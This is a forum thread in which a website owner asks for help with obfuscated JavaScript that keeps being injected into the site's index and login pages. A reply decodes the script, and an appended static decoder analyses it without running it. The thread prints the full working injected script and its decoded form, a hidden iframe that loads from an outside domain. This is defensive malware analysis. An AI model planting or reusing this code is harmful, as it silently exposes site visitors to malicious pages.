got a virus named Iframe.ph on my server


Jawed

Hi all,

 

I have a website running. It was fine a few days back, but now when I open the site it opens a blank page. Then I checked the code of the index page and found that there is a JavaScript embedded in my code in all index pages and login pages; this JavaScript did open a blank page.

I downloaded the whole site, deleted the code from the server, and scanned the code with Kaspersky antivirus and Norton antivirus; both did not show any virus in the code. Then I manually checked all index and login named pages and no malicious code was there. Then I uploaded the site again, but to my bad luck the virus came again in Iframe.ph and again the site is not opening due to the same JavaScript code?

 

I am using Dreamweaver CS3 and my site is hosted on netsol. The problem is that all the files named index and login are affected; all the code in these files gets lost and this JavaScript is embedded:

 

<script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'3225363125366425363525323025366
52536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script>

 

I tried many things but none worked out; I even removed the write permission of the index and login files, but this too did not work.

 

Thanks in advance for any kind of help.

Can anyone help me in this regard?


Are you sure the virus is part of the files on your server? Maybe your computer got a virus or your account info got stolen, and a remote script is logging in as you and changing the files.

 

I'd back up your files, reformat, change your password, then go over your site code and try to find the virus. If you are using a big CMS with too much code to wade through, just download the newest version and move your data over. Also, contact netsol and have them make sure you don't have any processes or bad crontabs set to run.


Here's your virus decoded.  1st step:

 

<script>function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content();

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%78%75%3d%31&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%31%35%32%37%29%2b%27%65%38%61%38%32%39%65%37%64%66%64%27%20%77%69%64%74%68%3d%35%36%33%20%68%65%69%67%68%74%3d%34%32%39%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

 

2nd step (results of unescape()):

 

<iframe name=c4 src='http://google-analize.com/in.cgi?15&xu=1&'+Math.round(Math.random()*241527)+'e8a829e7dfd' width=563 height=429 style='display: none'></iframe>

 

If the code keeps coming back then something is placing it there.  I think Tibberous gave good advice there.
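
Added example, not part of any post in this thread: a static decoder that repeats the two decoding steps shown above on the script's text, without executing it, and reports each iframe's host and whether the frame is hidden. The function names, `SAMPLE_STAGE1` and the host `injected.example` are constructed for illustration; `PAGE_FRAGMENT` is the opening of the payload posted in the thread.

```javascript
// Static decoder for the two-layer obfuscation in this thread. The script is
// handled as text only: nothing is eval'd or written into a document.

// Opening of the payload posted in the thread, and a constructed stage-1
// sample whose host (injected.example) is a placeholder.
const PAGE_FRAGMENT = "'3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E'";
const SAMPLE_STAGE1 = "if(!myia){document.write(unescape('%3ciframe name=c4 " +
  "src=%27http://injected.example/in.cgi?15%27 width=563 height=429 " +
  "style=%27display: none%27%3e%3c/iframe%3e'));}";

// 'AB'+zf3+'CD' pieces. Assumption: the padding variable is the empty string
// (the posted script declares var zf3=''), so only the literals matter.
function joinLiterals(expr) {
  return (expr.match(/'[^']*'/g) || []).map(s => s.slice(1, -1)).join('');
}

// Pairs of hex digits to characters, as parseInt(x,16) + fromCharCode does.
function hexDecode(hex) {
  if (!/^(?:[0-9a-f]{2})+$/i.test(hex)) return null; // not a hex payload
  return hex.replace(/../g, p => String.fromCharCode(parseInt(p, 16)));
}

// %XX escapes, expanded the way unescape() expands them.
function percentDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Every iframe in the decoded markup: its host and whether it is hidden.
function findIframes(html) {
  return Array.from(html.matchAll(/<iframe\b[^>]*>/gi), m => {
    const src = /src\s*=\s*['"]?\s*https?:\/\/([^\/'"\s>]+)/i.exec(m[0]);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(m[0]);
    return { host: src ? src[1].toLowerCase() : null, hidden };
  });
}

// Full pipeline over the text of one injected <script> block.
function analyzeInjectedScript(text) {
  const hexExpr = /=\s*((?:'[0-9a-f]*'\s*\+\s*\w+\s*\+\s*)+'[0-9a-f]*')/i.exec(text);
  const stage1 = hexExpr ? hexDecode(joinLiterals(hexExpr[1])) : null;
  const js = stage1 || text;
  const arg = /unescape\(\s*'([^']*)'/.exec(js);
  return findIframes(arg ? percentDecode(arg[1]) : js);
}

console.log(hexDecode(joinLiterals(PAGE_FRAGMENT)), analyzeInjectedScript(SAMPLE_STAGE1));
```

Run `analyzeInjectedScript` over the text of each `<script>` block in the affected index and login files; the reported host is the value to look for in the other files on the account.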
